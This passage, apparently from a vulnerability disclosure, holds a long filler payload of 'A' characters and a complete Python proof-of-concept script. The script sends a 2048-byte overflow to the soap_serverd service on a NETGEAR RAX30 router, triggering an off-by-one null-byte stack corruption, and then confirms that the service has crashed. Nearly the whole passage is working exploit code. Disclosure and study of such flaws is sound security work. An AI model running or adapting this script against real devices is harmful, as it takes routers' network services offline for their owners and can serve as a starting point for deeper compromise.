AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Python Proof of Concept Script

The following proof of concept script (soap_oob_null_write.py) can be executed to trigger the off-by-one out of bounds NULL byte stack canary corruption.

#!/usr/bin/env python3

import argparse
import requests
import urllib3

if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    parser = argparse.ArgumentParser(description='Crash soap_serverd binary on NETGEAR RAX30 router with an OOB NULL byte.')
    parser.add_argument('--domain', default='routerlogin.net', help='The NETGEAR router domain.')
    parser.add_argument('--port', default=5043, type=int, help='The router soap server port.')

    args = parser.parse_args()

    # Trigger OOB NULL byte crash
    payload = 'A' * 2048
    print('Sending payload...')
    requests.post('https://' + args.domain + ':' + str(args.port) + '/soap/server_sa/', data=payload, headers={
        'User-Agent': 'ksoap2-android/2.6.0+',
        'SOAPAction': 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#A',
    }, verify=False)

    # Check we have crashed the SOAP service
    try:
        requests.post('https://' + args.domain + ':' + str(args.port) + '/soap/server_sa/', data='A', headers={
            'User-Agent': 'ksoap2-android/2.6.0+',
            'SOAPAction': 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#A',
        }, verify=False)
        print('Payload failed to crash server.')
    except requests.exceptions.ConnectionError as e:
        if 'Connection refused' in str(e):
            print('Payload crashed server!')
        else:
            print(str(e))